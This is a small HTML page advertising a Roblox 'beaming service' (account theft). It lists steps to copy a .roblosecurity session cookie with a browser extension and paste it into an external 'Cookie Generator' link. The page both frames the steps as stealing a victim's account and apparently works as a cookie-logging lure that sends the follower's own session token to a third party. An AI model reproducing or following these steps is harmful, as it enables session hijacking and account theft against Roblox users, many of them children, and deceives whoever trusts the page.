<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Beaming Service</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
            background-color: #f9f9f9;
            color: #333;
        }
        h1 {
            margin-top: 20px;
            font-size: 36px;
            color: #000;
        }
        .steps {
            max-width: 600px;
            margin: 20px auto;
            text-align: left;
            font-size: 20px;
            line-height: 1.6;
        }
        .steps a {
            color: #007BFF;
            text-decoration: none;
        }
        .steps a:hover {
            text-decoration: underline;
        }
    </style>
</head>
<body>
    <h1>Welcome To My Beaming Service!</h1>
    <div class="steps">
        <p>STEP 1: <a href="https://chromewebstore.google.com/detail/editthiscookies/hlgpnddmgbhkmilmcnejaibhmoiljhhb" target="_blank">download Edit This Cookie</a></p>
        <p>STEP 2: go to the victim's profile</p>
        <p>STEP 3: open the plugin and click on ".roblosecurity"</p>
        <p>STEP 4: copy the code</p>
        <p>STEP 5: <a href="https://spanglytap.github.io/cookie2cookielog/bongas.html" target="_blank">go to the Cookie Generator</a></p>
        <p>STEP 6: copy-paste the code and generate a new one</p>
        <p>STEP 7: copy the new code into .roblosecurity and refresh the page</p>
    </div>
</body>
</html>
